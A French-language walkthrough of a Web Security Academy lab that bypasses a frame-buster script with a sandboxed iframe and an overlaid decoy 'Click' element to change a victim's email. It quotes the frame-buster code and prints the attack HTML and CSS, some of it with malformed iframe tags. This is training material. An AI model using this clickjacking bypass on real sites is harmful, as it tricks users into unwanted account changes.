Clickjacking avec script anti-frame

Clickjacking with a frame buster script

Lab: Clickjacking with a frame buster script | Web Security AcademyWebSecAcademy

Réaliser une attaque de clickjacking qui modifie l’adresse e-mail de l’utilisateur malgré la présence d’un « frame buster ». Le labo est résolu lorsque l’e-mail du compte a été changé.

Identifiants fournis

Utilisateur : wiener
Mot de passe : peter

Constat initial

En essayant d’afficher la page du compte dans un <iframe> classique, la page renvoie le contenu suivant (exemple d’URL testé) :

<iframe src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/my-account?email=wiener"</iframe>

Protection observée (frame buster)

La page contient un script qui empêche d’être encadrée et remplace le corps du document si la page est chargée dans un cadre :

if(top != self) {
 window.addEventListener("DOMContentLoaded", function() {
 document.body.innerHTML = 'This page cannot be framed';
 }, false);
}

Ce mécanisme détecte quand la page est dans un iframe et neutralise le contenu affiché.

<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/[email protected]"</iframe>

Exemple de style et de calque de leurre utilisé

<style>
iframe{
width: 500px;
height: 600px;
}
div{
position: relative;
top: 455px;
left: 80px;
}
</style>
<div>Click</div>
<iframe sandbox="allow-forms" src="https://0a74006604f0c1e280f1038e00a10010.web-security-academy.net/[email protected]"</iframe>

Mis à jour il y a 4 mois

hashtagClickjacking with a frame buster script

hashtagIdentifiants fournis

hashtagConstat initial

hashtagProtection observée (frame buster)

Clickjacking with a frame buster script

Identifiants fournis

Constat initial

Protection observée (frame buster)